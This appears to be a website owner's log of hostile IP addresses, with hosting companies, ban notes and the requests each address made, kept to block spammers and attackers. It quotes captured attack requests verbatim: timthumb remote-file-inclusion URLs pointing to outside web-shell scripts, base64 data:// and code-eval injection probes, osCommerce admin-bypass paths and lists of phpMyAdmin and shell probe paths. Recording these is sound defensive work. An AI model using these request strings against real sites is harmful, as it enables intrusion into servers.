Company: Greece – Athens Multiprotocol Service Provider To Other Isp’s And End Users
Mail server
94.181.130.242 Hostname: dynamicip-94-181-130-242.pppoe.penza.ertelecom.ru
Company: Russian Federation – Penza Cjsc Er-telecom Holding
Comment spammer
94.181.128.0 – 94.181.159.255 Company: Russian Federation – Penza Cjsc Er-telecom Holding Banned region: Russian Federation
168.62.209.75 Company: United States – San Francisco Microsoft Corp Trying to register on restricted site
/user/register
190.255.186.210 Company: Colombia – Bogota Colombia Telecomunicaciones S.a. Esp Trying to register on restricted site
/user/register?zjixallipatw=lpgwunznm
108.59.252.94 Hostname: vps-1064591-4964.manage.myhosting.com
Company: United States – Pittsford Softcom America Inc.
Shared hosting server IP: 5 websites
Hacker looking for vulnerabilities
//wp-content/uploads/images.php
//wp-includes/jahat.php
/%E2%80%A6ordpress-website//thumb_editor.php
//wp-includes/class-wp-customize-client.php
//wp-includes/wp-services.php
//wp-includes/wp-script.php
/%E2%80%A6ordpress-website//x.txt
/%E2%80%A6ordpress-website//c.txt
/%E2%80%A6ordpress-website//logx.txt
66.55.72.82 Hostname: cloud.mtbmedia.com
Company: United States – Atlanta Skiplink Llc
Shared hosting server IP: 16 websites
Hacker looking for vulnerabilities
//wp-content/uploads/images.php
//wp-includes/jahat.php
//thumb_editor.php
//wp-includes/class-wp-customize-client.php
//wp-includes/wp-services.php
//wp-includes/wp-script.php
//x.txt
//c.txt
//logx.tx
69.197.189.18 Company: United States – Kansas City Wholesale Internet Inc. Brute Force register attack on restricted site with typical hacker URLs
/ucp.php?change_lang=en&mode=register
/profile.php?mode=register&agreed=true&coppa=0
/registration_rules.asp?FID=0
/?option=com_registration&task=register
/index.php?option=com_registration&task=register
/index.php?action=registernew
/index.php?page=en_Signup
/?page=login&cmd=register
/register.php
85.107.214.136 Hostname: 85.107.214.136.dynamic.ttnet.com.tr
Company: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
WordPress login attempt
85.107.0.0 – 85.107.255.255 Company: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi Restricted Region:
Bad host: Ankara Turk Telekomunikasyon Anonim Sirketi
99% of IP’s from this company used for spamming and dictionary attacks
193.234.166.161 Company: Sweden – Stockholm Proxy Services Forbidden method: GET
66.248.194.163 Company: United States – Dallas Marcus Bergman Spammer
Trying to login with user name aiyverona
Trying to add content: /node/add
94.181.186.196 Hostname: dynamicip-94-181-186-196.pppoe.penza.ertelecom.ru
Company: Russian Federation – Penza Cjsc Er-telecom Holding
Comment spammer
94.181.184.0 – 94.181.191.255 Company: Russian Federation – Penza Cjsc Er-telecom Holding Banned region: Russian Federation
Bad host: Penza Cjsc Er-telecom Holding
95.79.106.71 Hostname: dynamicip-95-79-106-71.pppoe.nn.ertelecom.ru
Company: Russian Federation – Nizhniy Novgorod Cjsc Er-telecom Holding
Comment spammer
95.79.104.0 – 95.79.111.255 Company: Russian Federation – Nizhniy Novgorod Cjsc Er-telecom Holding Banned region: Russian Federation
88.227.94.114 Hostname: 88.227.94.114.dynamic.ttnet.com.tr
Company: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
Multiple attempts to login to WordPress
/wp-login.php
88.227.93.145 – 88.227.95.82 Turkey Restricted region: Turkey
65.55.24.234 Hostname: msnbot-65-55-24-234.search.msn.com
Company: United States – Redmond Microsoft Corp
Rule breaker, Bad bot and possible spambot
Triggered PHP warnings in Drupal
Cannot change zlib.output_compression – headers already sent in drupal_serve_page_from_cache
() (line 1353 of /home/*******/public_html/includes/bootstrap.inc).
Cannot modify header information – headers already sent by (output started at /home/*******
/public_html/includes/bootstrap.inc:1364) in drupal_send_headers() (line 1216 of /home/*******/
public_html/includes/bootstrap.inc).The bot looked for a non existent comment form DOMAIN/
comment/184
Rule breaker – /comment/ is specifically disallowed in robots.txt.
23.29.56.249 Hostname: 23-29-56-249.5280enterprises.com
Company: United States – Ashburn 5280 Enterprises Llc
Comment Spammer
198.50.215.34 Company: Canada – Montreal Ovh Hosting Inc. Comment Spammer
Bad host: Ovh Hosting Inc.
199.59.57.191 see next Hostname: smtp2.clixtrackr.com
Company: United States – Tulsa Private Customer
Tried to register on restricted site
Malicious user agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
199.59.56.0 – 199.59.63.255 Company: United States – Tulsa Private Customer Bad host: Tulsa Private Customer
Very high percentage of IPs registerred to Tulsa Private Customer have bad honeypot reports
193.34.172.62 see next Hostname: 62-172.users.icservice.net.ua
Company: Ukraine – Podvinogradov Pe Infocomservice
Looking for WordPress plugins with known vulnerabilities.
Looking for readme.txt files for these plugins
193.34.172.0 – 193.34.173.255 Region: Ukraine Banned region: Ukraine
This IP range is extremely high risk and should be banned
216.59.32.115 Hostname: us55.toservers.com
Company: Argentina – Buenos Aires Virtucom Network Sa
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
142.54.181.180 Company: United States – Kansas City Zhao Lee Comment Spammer
198.2.208.34 see next Company: United States – PEG TECH INC Comment Spammer
198.2.192.0 – 198.2.255.255 Company: United States – PEG TECH INC Bad host: PEG TECH INC
142.4.112.217 see next Company: United States – San Jose Wang He
PEG TECH INC
Comment Spammer
142.4.112.208 – 142.4.112.223 Company: United States – San Jose Wang He
PEG TECH INC
Bad host: PEG TECH INC
198.27.66.119 Hostname: ns4005155.ip-198-27-66.net
Company: Canada – Montreal Ovh Hosting Inc.
Comment Spammer
41.133.175.235″>41.133.175.235 Hostname: 41-133-175-235.dsl.mweb.co.za
Company: South Africa – Cape Town Mweb Connect (proprietary) Limited
Mail server / Dictionary attacker
115.115.85.42
115.115.84.216
115.115.84.214
115.115.84.205
115.115.84.196
115.115.84.194
115.115.84.130
Company: India – Mumbai Internet Service Provider Spammer and/or dictionary attacker
69.197.189.57 Company: United States – Kansas City Wholesale Internet Inc. Trying to register on restricted site
/user/register
/tiki-register.php
208.110.71.50 Hostname: lostyourmind.info
Company: United States – Evanston Pure Pulse Media Llc
Trying to register on restricted site
/user/register
/tiki-register.php
206.159.120.95 Hostname: mdimail5.midwestdatainc.com
Company: United States – Lawrenceburg Midwest Data Inc
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
75.126.150.2 Hostname: emedia.e-mediaresources.com
Company: United States – Dallas Al Host.net
Shared hosting server IP
Hacker looking for WordPress scripts
//wp-includes/wp-services.php
//x.txt
//wp-includes/jahat.php
//wp-includes/class-wp-customize-client.php
//thumb_editor.php
//logx.txt
//c.txt
199.119.180.151 Hostname: mhsecure.serverpowered.net
Company: United States – Orlando Infinitum Technologies Inc.
Website server IP: websites – mhsecure.com, stubuchalter-photos.com
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/Flexible/timthumb.php?src=http: //flickr.com.golfpops.com/r57.php
94.242.255.142 Hostname: ip-static-94-242-255-142.as5577.net
Company: Luxembourg – Steinsel Root Sa
Comment Spammer
74.221.222.136 Company: United States – Seattle Dme Hosting Llc Comment Spammer
198.50.136.237 Company: Canada – Montreal Ovh Hosting Inc. Comment Spammer
Bad host
Banned user agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
192.119.144.207 Company: United States – Dallas Patrick Song Comment Spammer
Banned user agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0)
Opera 7.02 Bork-edition [en]
91.224.160.25 see next Company: Netherlands – Amsterdam Bergdorf Group Ltd. Tried to access phpMyAdmin / mySQL and other server admin
/pma/index.php
/phpMyAdmin/index.php
/PMA/index.php
/dbadmin/index.php
/mysql/index.php
/myadmin/index.php
/php-my-admin/index.php
/sqlmanager/index.php
/mysqlmanager/index.php
/phpmanager/index.php
/webadmin/index.php
/sqlweb/index.php
/websql/index.php
/webdb/index.php
/mysqladmin/index.php
/mysql-admin/index.php
/php-myadmin/index.php
/phpmy-admin/index.php
91.224.160.0 – 91.224.161.255 Company: Netherlands – Amsterdam Bergdorf Group Ltd. Bad Host: Bergdorf Group
95.28.236.220 see next Hostname: 95-28-236-220.broadband.corbina.ru
Company: Russian Federation – Moscow Dynamic Ip Pool For Broadband Customers
Comment Spammer
95.24.0.0 – 95.30.255.255 Company: Russian Federation – Moscow Dynamic Ip Pool For Broadband Customers Banned region: Russian Federation
188.165.251.128 Hostname: ns380613.ovh.net
Company: France – Roubaix Ovh Systems
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/Quadro/timthumb.php?src=http: //picasa.com.transform-magazine.net/bat.php
168.144.48.134 Hostname: vps-1129352-15800.manage.myhosting.com
Company: Canada – Toronto Softcom Technology Consulting Inc.
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/circled/scripts/timthumb.php?src=http: //flickr.com.amcrecordsinc.com/cp
/wp-content/themes/circled/scripts/timthumb.php?src=http: //flickr.com.amcrecordsinc.com/shellx.php
82.141.148.102 see next Hostname: mail.mbrt.hu
Company: Hungary – Budapest Ptc-adsl-pool Countrywide
Brute force hacking attack – more than 400 hits in 9 minutes looking for e.g.
/includes/admin_board2.php?phpbb_root_path=data://text/plain;base64,
U0hFTExfTU9KTk9fUFJPQk9WQVRK?ls/includes/admin_board2.php?phpbb_root_path=
1’+–+?ls/system/includes/pageheaderdefault.inc.php?_sysSessionPath=1’+–+
/system/includes/pageheaderdefault.inc.php?_sysSessionPath=data://text/
plain;base64,U0hFTExfTU9KTk9fUFJPQk9WQVRK/system/admin/include/upload_form.php
?GLOBALS=1’+–+/system/admin/include/upload_form.php?GLOBALS=data://
text/plain;base64,U0hFTExfTU9KTk9fUFJPQk9WQVRK
TOO MANY TO LIST
82.141.148.0 – 82.141.148.255 Company: Hungary – Budapest Ptc-adsl-pool Countrywide Banned region: Hungary
Bad host
198.245.49.185 Hostname: ks4001081.ip-198-245-49.net
Company: Canada – Montreal Ovh Hosting Inc.
Comment Spammer
Bad host: Ovh Hosting Inc
83.142.226.78 Company: United Kingdom Glasgow Iomart Hosting Limited
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/circled/scripts/timthumb.php?src=http %3A%2F%2Fflickr.com.3dkraloyun.com
/wp-content/themes/circled/scripts/timthumb.php?src=http %3A%2F%2Fflickr.com.3dkraloyun.com
%2Fbad.php
URL/&amp;sa=U&amp;ei=gdqoUfPYF6OKjALv54GgDA&amp;ved=0CI8CEBYwSThk&amp;usg=
AFQjCNGJz4ZuISZ14yLl9czhG-o0URZXEA/wp-content/themes/circled/scripts/timthumb.php
173.208.187.253 Hostname: vps2.confidentialemails.net
Company: United States – Kansas City Gold Vip Club
Website server IP: website – traderinweb.com
Comment Spammer
142.4.113.105 Company: United States -San Jose Vpsbus
PEG TECH INC
Website server IP: junk websites – sfbwg.cn szhomi.com
Comment Spammer
142.4.113.104 – 142.4.113.111 Company: United States -San Jose Vpsbus
PEG TECH INC
Bad host
87.98.243.134 see next Company: France – Roubaix Ovh Systems Tried to register on restricted site
61.38.186.148 Company: Korea, Republic Of – Seoul Dacom Corp. Comment Spammer
188.134.38.199 Company: Russian Federation – Saint Petersburg Perspectiva Ltd. Looking for scripts:
/wp-login.phpindex.php
188.134.0.0 – 188.134.63.255 Company: Russian Federation – Saint Petersburg Perspectiva Ltd. Banned region: Russian Federation
100.42.213.31 Hostname: 100-42-213-31.static.webnx.com
Company: United States – Los Angeles Webnx Inc.
Comment Spammer
91.121.210.184 see next Hostname: ks364740.kimsufi.com
Company: France – Roubaix Ovh Systems
Website server IP: junk websites – ajaccio-immobilier.com – cupabia.com
Multiple attempts to register
/user/register
/join
87.205.177.71 Hostname: 87-205-177-71.adsl.inetia.pl
Company: Poland – Warsaw Netia Sa
Tried to register on restricted site
Mail server
198.171.171.102 Hostname: pureluxu.securesites.net
Company: United States – Englewood Ntt America Inc.
Shared hosting server IP: 14 websites
Bad requests
URL/&sa=U&ei=3P2qUdWwCuOv4AT504GwDQ&ved=0CEgQFjAP&usg=
AFQjCNHy4A8SkDco3WGmMa6QXF54-aLuHw/index.php
URL/index.php
91.121.202.98 see next Hostname: ks3094130.kimsufi.com
Company: France – Roubaix Ovh Systems
Comment Spammer
Bad host: Roubaix Ovh Systems
37.59.71.177 Hostname: ks3094130.kimsufi.com
Company: France – Roubaix Ovh Systems
Comment Spammer
Bad host: Roubaix Ovh Systems
188.143.232.133 see next Company: Russian Federation – Saint Petersburg Petersburg Internet Network Ltd. Looking for index.php in directories
188.143.232.0 – 188.143.232.255 Company: Russian Federation – Saint Petersburg Petersburg Internet Network Ltd. Banned region: Russian Federation
190.239.205.29 Company: Peru – Lima Tdperx6 Lacnic Tried to access site admin
/admin.php
190.239.204.60 – 190.239.205.252 98% of IPs in this range have bad reports (spammers / dictionary attackers) on Project Honeypot
89.35.222.229 Hostname: mail.xdigital.ro
Company: Romania – Timisoara Goodnet Srl
Shared hosting server IP: 12 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
89.35.216.0 – 89.35.223.255 Company: Romania – Timisoara Goodnet Srl Restricted region: Romania
190.183.221.108 Hostname: dedicado.bluscai.com
Company: Argentina – Buenos Aires Wnpower.com
Shared hosting server IP: 109 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
93.186.196.151 Hostname: k151.khaki.fastwebserver.de
Company: Germany – Dusseldorf Fast It Colocation/khaki Line
Shared hosting server IP: 34 websites
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/reestate/timthumb.php?src=http: //flickr.com.amcrecordsinc.com/cpx.php
/wp-content/themes/reestate/timthumb.php?src=http: //flickr.com.amcrecordsinc.com/shellx.php
93.182.130.27 Hostname: anon-130-27.relakks.com
Company: Sweden – Lund Viaeuropa I Lund Ab
Comment Spammer
93.182.130.0 – 93.182.131.255 Company: Sweden – Lund Viaeuropa I Lund Ab Bad host
107.23.46.183 Hostname: ec2-107-23-46-183.compute-1.amazonaws.com
Company: United States – Ashburn Amazon.com Inc.
Looking for exploit:
//wp-includes/jahat.php
//wp-includes/wp-services.php
//thumb_editor.php
//c.txt
//wp-includes/class-wp-customize-client.php
/wp-content/uploads/images.php
/wp-includes/class-wp-customize-client.php
69.12.247.174 Hostname: 69-12-247-174.dedicated.static.sonic.net
Company: United States – San Francisco Sonic.net Inc.
Looking for exploit:
/includes/functions.inc.php?sitepath=data://text/plain;base64,U0hFTExfTU9KTk9fUFJPQk9WQVRK
198.50.139.51
198.50.209.152
Company: United States – Newark Ovh Comment Spammer
198.200.37.83 see next Company: China – Hangzhou Jack King Comment Spammer
198.200.32.0 – 198.200.63.255 Company: China – Hangzhou Jack King Banned region: China
158.181.205.210 Company: Kyrgyzstan – Bishkek Mega-line Ltd. Looking for non-existent URLs based on text content (Noy a link)
158.181.128.0 – 158.181.255.255 Company: Kyrgyzstan – Bishkek Mega-line Ltd. Restricted region: Kyrgyzstan
Single violation sufficient to ban host
74.208.127.96 Hostname: u15370069.onlinehome-server.com
Company: United States – Wayne 1&1 Internet Inc.
Shared hosting server IP
Hacker looking for for vulnerabilities:
/Basic8.php?c_id=ZWNobygidDc0Mzk4MTIiKTs=
74.52.124.82 Hostname: typhoon.websitewelcome.com
Company: United States – Dallas Theplanet.com Internet Services Inc.
Shared hosting server IP
Hacker looking for for vulnerabilities:
/appserv/lang-english.bak.php?c_id=ZWNobygidDc0Mzk4MTIiKTs=
50.117.46.169 Company: United States – San Jose 5280 Enterprises Llc Comment Spammer
Banned User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)
80.93.217.38 see next Hostname: static-80-93-217-38.fibersunucu.com.tr
Company: Turkey – Istanbul Fibersunucu Internet Hizmetleri Ugur Pala
Comment Spammer
80.93.217.32 – 80.93.217.47 Company: Turkey – Istanbul Fibersunucu Internet Hizmetleri Ugur Pala Restricted region: Turkey
Bad host
192.74.237.182 see next Company: United States – San Jose Qingfeng
PEG TECH INC
Comment Spammer
192.74.237.176 – 192.74.237.191 Company: United States – San Jose Qingfeng
PEG TECH INC
Bad host: PEG TECH INC
94.242.237.127 Hostname: hosted-by.buyurl.net
Company: Luxembourg – Steinsel Root Sa
Comment Spammer
88.230.190.88 see next Hostname: 88.230.190.88.dynamic.ttnet.com.tr
Company: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
Tried to login to WordPress admin
88.230.0.0 – 88.230.255.255 Company: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi Restricted region: Turkey
Bad host
125.136.130.16 Company: Korea, Republic Of – Seoul Korea Telecom
Shared hosting server IP: website – gvovideo.com
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
89.221.250.11 Hostname: www11.aname.net
Company: Sweden – Helsingborg Fsd Internet Tjanster Ab
Shared hosting server IP
Bad request
URL /%22%20onmousedown=%22return%20rwt(this,\’\’,\’\’,\’\’,\’63\’,\’AFQjCNFaNNZ-
Bo_FzyNQ8t7x0ZxmO36Fxg\’,\’\’,\’0CKkDEBYwPg\’,\’\’,\’\’,event%22%3EEasy%20Columns%20Plugin%20for%20WordPress%20-%20User%20Guide%20
Review%20and%20Rating%3C/a%3E%3C/h3%3E%3Cdiv%20class=%22s%22%3E%3Cdiv
%3E%3Cdiv%20class=%22thb%20th%22%20style=%22height:44px;width:44px%22%3E%
3Ca%20href=%22/search
173.192.235.226 Hostname: 173.192.235.226-static.reverse.softlayer.com
Company: United States – Chicago Softlayer Technologies Inc.
Rule breaker / Bad bot
SiteExplorer/1.0
173.192.34.95 Hostname: 173.192.34.95-static.reverse.softlayer.com
Company: United States – Dallas Hosting Services Inc.
Rule breaker / Bad bot
Aboundex/0.2 (http: //www.aboundex.com/crawler/)
Aboundex/0.3 (http: //www.aboundex.com/crawler/)
Part of the SiteExplorer/1.0 hacker network
82.94.214.64 Hostname: gw.c1.byte.nl
Company: Netherlands – Amsterdam Byte Internetdiensten
looking for non-existent scripts
/magento/js/mage/cookies.js
/js/mage/cookies.js
71.40.108.83 Hostname: 83.108.40.71.gvodatacenter.com
Company: United States – Schertz Road Runner Holdco Llc
Website server IP: website – gvovideo.com
hacker looking for non-existent files
/st/admin/rotator.php
198.23.48.156 Hostname: hosted.by.liquidnetlimited.com
Company: United States – Pompano Beach Liquidnet Us Llc
Shared hosting server IP
spammer looking for non-existent files
/comments/script.php
173.254.69.161 Hostname: 173-254-69-161.unifiedlayer.com
Company: United States – Provo Unified Layer
Shared hosting server IP
hacker looking for non-existent files
/admin/xmpl.php
216.59.18.115 Hostname: static-ip-115-18-59-216.host.cybernet.co.id
Company: United States – Carol Stream Cachednet Llc
Tried to login with username: jason9166.
Tried to add content: /node/add
93.186.180.126 Hostname: daweb18.oxilion.nl
Company: Netherlands – Enschede Oxilion B.v.
Shared hosting server IP
looking for non-existent files
/page/log.php
50.97.104.67 Hostname: senku.websitewelcome.com
Company: United States – Los Angeles Softlayer Technologies Inc.
Shared hosting server IP
looking for non-existent files
/feed/ftp.php
66.147.244.179 Hostname: box679.bluehost.com
Company: United States – Provo Unified Layer
Shared hosting server IP
looking for non-existent scripts
/cgi-bin/b.php
184.173.232.43 Hostname: gator1541.hostgator.com
Company: United States – Los Angeles Theplanet.com Internet Services Inc.
Shared hosting server IP
looking for non-existent files
/newposts/ftp.php
88.190.253.52 Hostname: f5-sd32.online.net
Company: France – Paris Free Sas
looking for non-existent files
/page/ftp.php
50.23.201.229 Hostname: r6-dallas.webserversystems.com
Company: United States – Denver World Wide Web Hosting Llc
Shared hosting server IP
looking for non-existent files
/index/7/1.php
Known dictionary attacker and bad web host
173.254.52.24 Hostname: 173-254-52-24.unifiedlayer.com
Company: United States – Provo Unified Layer
Shared hosting server IP
looking for non-existent files
/page/img.php
173.254.28.133 Hostname: just133.justhost.com
Company: United States – Temecula Unified Layer
Shared hosting server IP
looking for non-existent files
/index/5/1.php
74.53.227.162 Hostname: sienna.websitewelcome.com
Company: United States – Dallas Theplanet.com Internet Services Inc.
Shared hosting server IP
looking for non-existent files
/forum/ftp.php
74.220.207.127 Hostname: host127.hostmonster.com
Company: United States – Temecula Unified Layer
Shared hosting server IP
looking for non-existent files
/wp-content/themes/ftp.php
74.53.27.146 Hostname: frontier.websitewelcome.com
Company: United States – Dallas Theplanet.com Internet Services Inc.
Shared hosting server IP
hacker looking for non-existent files
/plugins/system/dvmessages/dvmessages.php?c_id=ZWNobygidDc0Mzk4MTIiKTs=
184.173.232.3 Hostname: gator1526.hostgator.com
Company: United States – Los Angeles Theplanet.com Internet Services Inc.
Shared hosting server IP
hacker looking for non-existent files
/plugins/system/dvmessages.php
37.59.91.151 see next Company: France – Roubaix Ovh Systems Tried to register on WordPress site
201.185.29.82 Hostname: adsl-201-185-29-82.une.net.co
Company: Colombia – Medellin Epm Telecomunicaciones S.a. E.s.p.
Trying to login to WordPress
195.174.147.12″>195.174.147.12 see next Company: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi Trying to login to WordPress
195.174.128.0 – 195.174.159.255 Company: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi Restricted region: Turkey
Bad host
121.111.68.61 Hostname: KD121111068061.ppp-bb.dion.ne.jp
Company: Japan – Tokyo Dion
Trying to login to WordPress
190.233.29.142″>190.233.29.142 Company: Peru – Lima Tdperx21 Lacnic Trying to login to WordPress
190.237.242.239″>190.237.242.239 Company: Peru – Lima Tdp Grs Trying to login to WordPress
190.119.77.237″>190.119.77.237 Company: Peru – Lima America Movil Peru S.a.c. Trying to login to WordPress
190.119.77.237
190.119.84.43
190.119.84.43
Company: Peru – Lima America Movil Peru S.a.c. Trying to login to WordPress
190.255.245.44″>190.255.245.44 Company: Colombia – Bogota Colombia Telecomunicaciones S.a. Esp Trying to login to WordPress
181.64.158.188″>181.64.158.188 Company: Peru – Lima Tdperx4 Lacnic Trying to login to WordPress
201.172.3.88 Hostname: CableLink3-88.telefonia.InterCable.net
Company: Mexico – Monterrey Television Internacional S.a. De C.v.
Trying to login to WordPress
201.240.231.176 Company: Peru – Lima Tdperx21 Lacnic Trying to login to WordPress
190.129.4.253″>190.129.4.253 Company: Bolivia, Plurinational State Of – Oruro Entel S.a. – Entelnet Trying to login to WordPress
190.237.42.29″>190.237.42.29 Company: Peru – Lima Tdp Grs Trying to login to WordPress
190.43.28.26″>190.43.28.26 Company: Peru – Lima Tdperx3 Lacnic Trying to login to WordPress
190.253.153.175″>190.253.153.175 Company: Colombia – Bogota Colombia Telecomunicaciones S.a. Esp Trying to login to WordPress
46.196.90.241″>46.196.90.241 Company: Turkey – Izmir Turksat Uydu Haberlesme Ve Kablo Tv Isletme A.s. Trying to login to WordPress
190.237.162.109″>190.237.162.109 Company: Peru – Lima Tdp Grs Trying to login to WordPress
126.86.242.79 Hostname: softbank126086242079.bbtec.net
Company: Japan – Tokyo Japan Nation-wide Network Of Softbank Bb Corp.
Trying to login to WordPress
137.186.53.61 Hostname: d137-186-53-61.abhsia.telus.net
Company: Canada – Burnaby Telus Communications Inc.
Trying to login to WordPress
190.131.172.77 Hostname: host-190-131-172-77.ecutel.net.ec
Company: Ecuador – Quito Ecuadortelecom S.a.
Trying to login to WordPress
190.234.94.119″>190.234.94.119 Company: Peru – Lima Tdp Grs Trying to login to WordPress
85.96.200.192 see next Hostname: 85.96.200.192.dynamic.ttnet.com.tr
Company: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
Trying to login to WordPress
85.96.199.0 – 85.96.202.255 Company: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi Restricted region: Turkey
Bad host
181.130.198.124 Hostname: cable-181-130-198-124.une.net.co
Company: Colombia – Cota Epm Telecomunicaciones S.a. E.s.p.
Trying to login to WordPress
187.202.212.49 Hostname: dsl-187-202-212-49-dyn.prod-infinitum.com.mx
Company: Mexico – Mexico City Uninet S.a. De C.v.
Trying to login to WordPress
121.97.239.197 Hostname: 121.97.239.197.BTI.NET.PH
Company: Philippines – Legaspi Bayantel Broadband Dsl – Netbasic_netpersonal_netprivate
Trying to login to WordPress
189.152.156.4 Hostname: dsl-189-152-156-4-dyn.prod-infinitum.com.mx
Company: Mexico – Mexico City Gestion De Direccionamiento Uninet
Trying to login to WordPress
190.12.51.160 Hostname: corp-190-12-51-160-uio.puntonet.ec
Company: Ecuador – Quito Puntonet S.a.
Trying to login to WordPress
95.81.119.208″>95.81.119.208 see next Company: Iran, Islamic Republic Of – Tabriz Hamara System Tabriz Engineering Company Trying to login to WordPress
95.81.64.0 – 95.81.127.255 Company: Iran, Islamic Republic Of – Tabriz Hamara System Tabriz Engineering Company Restricted region: Iran
190.95.199.155 Hostname: host-190-95-199-155.telconet.net
Company: Ecuador – Guayaquil Clientes Jipijapa
Trying to login to WordPress
190.242.110.38″>190.242.110.38 Company: Colombia – Bogota Columbus Networks Colombia Trying to login to WordPress
187.209.42.251 Hostname: dsl-187-209-42-251-dyn.prod-infinitum.com.mx
Company: Mexico – Mexico City Uninet S.a. De C.v.
Trying to login to WordPress
173.254.73.102 Hostname: 173-254-73-102.unifiedlayer.com
Company: United States – Provo Unified Layer
Shared hosting server IP
Trying to exploit Drupal
/modules/mod_system/mod_system.php
198.2.200.13 Company: United States – PEG TECH INC Comment Spammer
Bad host: PEG TECH INC
85.119.152.84 Company: Germany – Koeln Vanager Gmbh
Shared hosting server IP
Comment Spammer
198.2.204.73 Company: United States – PEG TECH INC Comment Spammer
Bad host
66.96.183.11 Hostname: 11.183.96.66.static.eigbox.net
Company: United States – The Endurance International Group Inc.
Looking for WSO2 Framework files:
modules/wso2.php
87.98.217.198 see next Hostname: ns22101.ovh.net
Company: France – Paris Ovh Systems
Website server IP: website – weblinkcapital.com
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/premiumnews/thumb.php?src=http: //img.youtube.communication.
adrianaraya.cr/wp-login.php
87.98.216.0 – 87.98.223.255 Company: France – Paris Ovh Systems Bad host: Paris Ovh Systems
94.45.172.107 see next Hostname: dialin.customers.u-l.ru
Company: Russian Federation – Moscow Unionline Ltd.
Comment Spammer
94.45.160.0 – 94.45.191.255 Company: Russian Federation – Moscow Unionline Ltd. Banned Region: Russian Federation
190.201.202.118 Hostname: 190-201-202-118.dyn.dsl.cantv.net
Company: Venezuela, Bolivarian Republic Of – Caracas Cantv Servicios Venezuela
Comment Spammer
193.164.207.71 Company: United Kingdom – Nottingham Compuweb Communications Services Limited
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
216.18.208.61 Hostname: mx0.rockvillefloors.com
Company: United States – Los Angeles Webnx Inc.
Website server IP: Junk website – rrr166.com
Comment Spammer
199.204.45.120 Hostname: node-1jfpzzs.cloud9.ymq1.ca.layeredge.net
Company: Canada – Montreal Vexxhost
Comment Spammer
198.57.226.249 Hostname: int.internetpalacehotel.com.br
Company: United States – Provo Unified Layer
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
wp-content/themes/Basic/timthumb.php?src=http: //flickr.com.noviaschile.cl/cpx.php
201.141.109.125″>201.141.109.125 see next Company: Mexico – Mexico City Cablevision S.a. De C.v Trying to login to WordPress
201.141.108.156 – 201.141.110.93 Mexico Bad activity recorded in Project Honeypot
216.10.222.133″>216.10.222.133 Company: Jamaica – Kingston Columbus Communications Jamaica Limited Trying to login to WordPress
89-172-20-221.adsl.net.t-com.hr”>89.172.20.221 see next Hostname: 89-172-20-221.adsl.net.t-com.hr
Company: Croatia – Zagreb T-com Croatia
Trying to login to WordPress
89.172.0.0 – 89.172.31.255 Company: Croatia – Zagreb T-com Croatia Restricted region: Croatia
89.218.32.187 see next Company: Kazakhstan – Almaty Sanatorium Almaty Joint-stock Company Trying to login to WordPress
89.218.32.184 – 89.218.32.191 Company: Kazakhstan – Almaty Sanatorium Almaty Joint-stock Company Restricted region: Kazakhstan
37.218.147.51 see next Company: Kyrgyzstan – Bishkek Ojsc Kyrgyztelecom Trying to login to WordPress
37.218.128.0 – 37.218.159.255 Company: Kyrgyzstan – Bishkek Ojsc Kyrgyztelecom Restricted region: Kyrgyzstan
81.232.156.3 Hostname: 81-232-156-3-no238.tbcn.telia.com
Company: Sweden – Stockholm Telia Network Services
Trying to login to WordPress
187.206.199.82 Hostname: dsl-187-206-199-82-dyn.prod-infinitum.com.mx
Company: Mexico – Mexico City Uninet S.a. De C.v.
Trying to login to WordPress
69.65.42.235 Hostname: ip-69.65.42.235.servernap.net
Company: United States – Arlington Heights Gigenet
Hacker activity: Looking for admin access to site:
/streamrotator/admin.php
/sr/admin.php
/admin/admin.php
/administrator/admin.php
/adminsr/admin.php
/admin_sr/admin.php
sradmin/admin.php
168.144.170.106 Hostname: mejorhospedaje.net
Company: Canada – Toronto Softcom Technology Consulting Inc.
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
192.151.145.28 see next Company: United States – Kansas City Zhou Pizhong
